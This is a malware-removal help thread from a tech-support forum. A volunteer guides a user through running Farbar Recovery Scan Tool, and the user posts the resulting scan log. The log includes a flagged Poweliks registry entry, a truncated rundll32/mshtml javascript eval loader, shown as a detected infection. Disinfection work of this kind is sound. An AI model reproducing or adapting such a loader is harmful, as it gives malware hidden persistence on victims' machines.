Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Need help please Framer - inf ....movieroomreviews .... getdata and ot


  • This topic is locked This topic is locked

#1
JUSTME1969

JUSTME1969

    Member

  • Member
  • PipPip
  • 32 posts

Hi,

 

I keep getting threat popups. framer-inf.... movieroomreviews ...... getdata and many others after going to a news website yesterday. Can you please help me with this?  


  • 0

Advertisements


#2
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello and welcome to Geeks To Go! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexepected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Now, let's get started, shall we? :thumbsup:


Hello, let's get a look at your system and see what's going on. :)


Scan with Farbar's Recovery Scan Tool (FRST)


Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt

    farbarmainpanel_zps77bf9e25.jpg
  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

  • 0

#3
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Hi  Pystryker :) Thank you very much for helping me...I really appreciate it! I am in the process of DL the Farbar tool and 2 things come up. One if FSS.exe and the other is Farbar..is this supposed to happen? 


  • 0

#4
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Also I am having to DL the tool from Google Chrome which does not give me the option to save to desktop. Is there a way to do this that I am unaware of? When I try to DL from IE it tells me that my settings are not right to DL it ...this happens with everything that I try to DL but wasn't happening before the infection. 

 

I clicked on the scan button and after about 30 seconds Farbar window disappeared and there were no logs that popped up. Should I DL again because it is not on my desktop.


Edited by JUSTME1969, 01 January 2015 - 10:35 PM.

  • 0

#5
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

Hi Pystryker :) Thank you very much for helping me...I really appreciate it! I am in the process of DL the Farbar tool and 2 things come up. One if FSS.exe and the other is Farbar..is this supposed to happen?


Hello, you're quite welcome. :)

Which version do you need to download? The 64 bit or the 32 bit? Clicking on the button will send you to a page as the download starts that has other downloads on it. Then your download will start. Only download the version you need. :thumbsup:
  • 0

#6
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

Also I am having to DL the tool from Google Chrome which does not give me the option to save to desktop. Is there a way to do this that I am unaware of? When I try to DL from IE it tells me that my settings are not right to DL it ...this happens with everything that I try to DL but wasn't happening before the infection. 
 
I clicked on the scan button and after about 30 seconds Farbar window disappeared and there were no logs that popped up. Should I DL again because it is not on my desktop.

Try these instructions to change where Google Chrome downloads files to. :)



1.) Click the Chrome menu on the browser toolbar.

2.) Select Settings.

3.) Click Show advanced settings and scroll down to the "Downloads" section.

To change the default download location, click Change and select where you'd like your files to be saved.

If you'd rather choose a specific location for each download, select the "Ask where to save each file before downloading" checkbox.
  • 0

#7
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Thank you :) 

 

My PC takes the 32 bit version. I am trying to DL it again ...I found the settings for DL and it did ask where I wanted to Dl it to .. I selected desktop but the DL says FSS.exe is that correct? 


  • 0

#8
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

Thank you :) 
 
My PC takes the 32 bit version. I am trying to DL it again ...I found the settings for DL and it did ask where I wanted to Dl it to .. I selected desktop but the DL says FSS.exe is that correct? [/size]

No, the download will be FRST.exe which is the 32-bit version. :thumbsup:
  • 0

#9
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Ok I think I was finally able to get it DL ... I am about to try and scan again. 


  • 0

#10
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

Ok I think I was finally able to get it DL ... I am about to try and scan again.


:thumbsup:
  • 0

Advertisements


#11
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Here we go  :thumbsup:  :thumbsup: 

 

FRST txt 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2015
Ran by April (administrator) on APRIL-PC on 02-01-2015 00:07:49
Running from C:\Users\April\Desktop
Loaded Profile: April (Available profiles: April)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(SANDBOXIE L.T.D) C:\Program Files\Sandboxie\SbieSvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Coupons.com Inc.) C:\Program Files\Coupons\CouponPrinterService.exe
(Nero AG) C:\Program Files\Motorola Media Link\Lite\NServiceEntry.exe
(Eastman Kodak Company) C:\Program Files\Kodak\AiO\Center\EKAiOHostService.exe
(Eastman Kodak Company) C:\Program Files\Kodak\AiO\StatusMonitor\EKPrinterSDK.exe
() C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
() C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Eastman Kodak Company) C:\Program Files\Kodak\AiO\StatusMonitor\EKStatusMonitor.exe
(Gadwin Systems, Inc) C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\System32\cmmon32.exe
(Microsoft Corporation) C:\Windows\System32\systray.exe
(Microsoft Corporation) C:\Windows\System32\dpnsvr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\upnpcont.exe
(Microsoft Corporation) C:\Windows\System32\NAPSTAT.EXE
(Microsoft Corporation) C:\Windows\System32\dvdupgrd.exe
(Microsoft Corporation) C:\Windows\System32\dplaysvr.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [] => [X]
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5227112 2014-12-12] (AVAST Software)
HKLM\...\Run: [EKStatusMonitor] => C:\PROGRAM FILES\KODAK\AIO\STATUSMONITOR\EKStatusMonitor.exe [2750840 2013-12-11] (Eastman Kodak Company)
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\Run: [Gadwin PrintScreen] => C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe [487424 2011-05-03] (Gadwin Systems, Inc)
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {6f766fac-5ca7-11e1-ba6a-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {952aea8a-075f-11e3-a52c-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {97b3e8bf-0fa5-11e1-8250-001e33ff5421} - F:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [KodakHomeCenter] => C:\Program Files\Kodak\AiO\Center\AiOHomeCenter.exe [2234064 2014-05-06] (Eastman Kodak Company)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (AVAST Software)
CHR HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/...Box&FORM=IE10SR
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://startpage.com/
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.co...=TSNA&bmod=TSNA
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.startpage.com/
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = www.bing.com
SearchScopes: HKLM -> {8930D4D5-7D5F-4D26-8424-B1961D3E6EE0} URL = http://www.google.co...ng}&rlz=1I7TSNA
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> DefaultScope {8930D4D5-7D5F-4D26-8424-B1961D3E6EE0} URL = http://www.google.co...NA_enUS355US356
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> Comcast URL = http://search.xfinit...art_tech_search
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> {6C59297E-BFFE-4E6A-0BF5-4187155432D8} URL = http://www.bing.com/...eferrer:source}
SearchScopes: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> {8930D4D5-7D5F-4D26-8424-B1961D3E6EE0} URL = http://www.google.co...NA_enUS355US356
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-692471023-1834078390-643647909-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-0017-0000-0040-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF32_15_0_0_246.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.0.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-692471023-1834078390-643647909-1001: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2012-03-07]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\April\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll No File
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\39.0.2171.95\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\39.0.2171.95\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\39.0.2171.95\pdf.dll ()
CHR Plugin: (Coupons Inc., Coupon Printer) - C:\Program Files\Google\Chrome\Application\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7.4) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.550.14) - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java™ Platform SE 7 U55) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Catalina Savings Printer) - C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
CHR Plugin: (Shockwave for Director) - C:\windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
CHR Plugin: (Shockwave Flash) - C:\windows\system32\Macromed\Flash\NPSWF32.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll No File
CHR Profile: C:\Users\April\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (YouTube) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-27]
CHR Extension: (Google Search) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-27]
CHR Extension: (Avast Online Security) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-07-22]
CHR Extension: (Google Wallet) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-26]
CHR Extension: (Gmail) - C:\Users\April\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-27]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-02]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-02] (AVAST Software)
R2 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2009-08-10] (TOSHIBA CORPORATION)
R2 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-10] (TOSHIBA CORPORATION)
R2 CouponPrinterService; C:\Program Files\Coupons\CouponPrinterService.exe [152560 2014-02-13] (Coupons.com Inc.)
R2 DeviceMonitorService; C:\Program Files\Motorola Media Link\Lite\NServiceEntry.exe [87368 2011-09-19] (Nero AG)
S3 GameConsoleService; C:\Program Files\TOSHIBA Games\TOSHIBA Game Console\GameConsoleService.exe [250616 2009-05-22] (WildTangent, Inc.)
R2 Kodak AiO Network Discovery Service; C:\Program Files\Kodak\AiO\Center\EKAiOHostService.exe [395640 2014-05-06] (Eastman Kodak Company)
R2 Kodak AiO Status Monitor Service; C:\Program Files\Kodak\AiO\StatusMonitor\EKPrinterSDK.exe [780152 2013-12-11] (Eastman Kodak Company)
R2 MotoHelper; C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe [214896 2011-12-06] ()
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [72936 2011-03-24] (SANDBOXIE L.T.D)
S3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [185712 2009-08-11] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2009-09-17] (TOSHIBA Corporation)
S3 TPCHSrv; C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe [685424 2009-08-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\windows\system32\drivers\aswHwid.sys [24184 2014-12-02] ()
R2 aswMonFlt; C:\windows\system32\drivers\aswMonFlt.sys [70384 2014-12-02] (AVAST Software)
R1 aswRdr; C:\windows\system32\drivers\aswRdr2.sys [81768 2014-12-02] (AVAST Software)
R0 aswRvrt; C:\windows\system32\Drivers\aswRvrt.sys [49944 2014-12-02] ()
R1 aswSnx; C:\windows\system32\drivers\aswSnx.sys [787800 2014-12-02] (AVAST Software)
R1 aswSP; C:\windows\system32\drivers\aswSP.sys [423784 2014-12-02] (AVAST Software)
R2 aswStm; C:\windows\system32\drivers\aswStm.sys [91496 2014-12-02] (AVAST Software)
R0 aswVmm; C:\windows\system32\Drivers\aswVmm.sys [206248 2014-12-02] ()
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-22] (TOSHIBA Corporation)
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [126696 2011-03-24] (SANDBOXIE L.T.D)
R2 TVALZFL; C:\windows\System32\DRIVERS\TVALZFL.sys [12920 2009-06-19] (TOSHIBA Corporation)
S3 USBAAPL; C:\windows\System32\Drivers\usbaapl.sys [43520 2012-02-15] (Apple, Inc.) [File not signed]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-02 00:07 - 2015-01-02 00:11 - 00019140 _____ () C:\Users\April\Desktop\FRST.txt
2015-01-02 00:03 - 2015-01-02 00:04 - 01114624 _____ (Farbar) C:\Users\April\Desktop\FRST.exe
2015-01-01 23:55 - 2015-01-01 23:55 - 00415232 _____ (Farbar) C:\Users\April\Desktop\FSS.exe
2015-01-01 23:29 - 2015-01-02 00:08 - 00000000 ____D () C:\FRST
2015-01-01 23:00 - 2015-01-01 23:00 - 00415232 _____ (Farbar) C:\Users\April\Downloads\FSS.exe
2015-01-01 22:59 - 2015-01-01 23:00 - 01114624 _____ (Farbar) C:\Users\April\Downloads\FRST.exe
2015-01-01 22:52 - 2015-01-01 22:52 - 00000000 ____D () C:\Users\April\Desktop\OTHER
2015-01-01 22:41 - 2015-01-01 22:41 - 00000000 ____D () C:\Users\April\AppData\Local\{70746551-F9E7-4351-B1CC-D8BDBFA7CB6B}
2015-01-01 14:50 - 2015-01-01 14:51 - 02433253 _____ (MightyUninstaller.com ) C:\Users\April\Downloads\MightyUninstaller_Setup.exe
2015-01-01 14:46 - 2015-01-01 14:46 - 00000000 ____D () C:\Users\April\AppData\Local\{9BF9220E-F428-4080-9544-AC03B2A75DE2}
2015-01-01 02:11 - 2015-01-01 02:11 - 355712480 _____ () C:\windows\MEMORY.DMP
2015-01-01 02:11 - 2015-01-01 02:11 - 00145584 _____ () C:\windows\Minidump\010115-19921-01.dmp
2015-01-01 02:11 - 2015-01-01 02:11 - 00000000 ____D () C:\windows\Minidump
2015-01-01 01:18 - 2015-01-01 12:52 - 00000000 ____D () C:\Users\April\Desktop\WT
2015-01-01 01:12 - 2015-01-01 01:13 - 05198336 _____ (AVAST Software) C:\Users\April\Downloads\aswMBR (1).exe
2014-12-31 23:48 - 2015-01-01 00:18 - 00000000 ____D () C:\AdwCleaner
2014-12-31 23:44 - 2014-12-31 23:45 - 02173952 _____ () C:\Users\April\Downloads\adwcleaner_4.106.exe
2014-12-31 23:32 - 2014-12-31 23:33 - 04187592 _____ (Kaspersky Lab ZAO) C:\Users\April\Downloads\tdsskiller.exe
2014-12-31 01:05 - 2014-12-31 01:05 - 00000000 ____D () C:\Users\April\AppData\Local\{0FAFBB6C-829B-4650-B858-4E68BFE72B0D}
2014-12-30 12:29 - 2014-12-30 12:29 - 00000000 ____D () C:\Users\April\AppData\Local\{02E61EBD-EF53-403B-9870-6E9B5C219D0F}
2014-12-30 00:28 - 2014-12-30 00:29 - 00000000 ____D () C:\Users\April\AppData\Local\{1CA1BBA8-99A8-4C98-AF3B-0EAE117CD07A}
2014-12-27 23:00 - 2014-12-27 23:00 - 00000000 ____D () C:\Users\April\AppData\Local\{B7063962-60B2-48AD-A6FD-DC09FC2B2E87}
2014-12-26 15:47 - 2014-12-26 15:47 - 00000000 ____D () C:\Users\April\AppData\Local\{FB72192C-3175-480A-81AF-5F7E58F5F525}
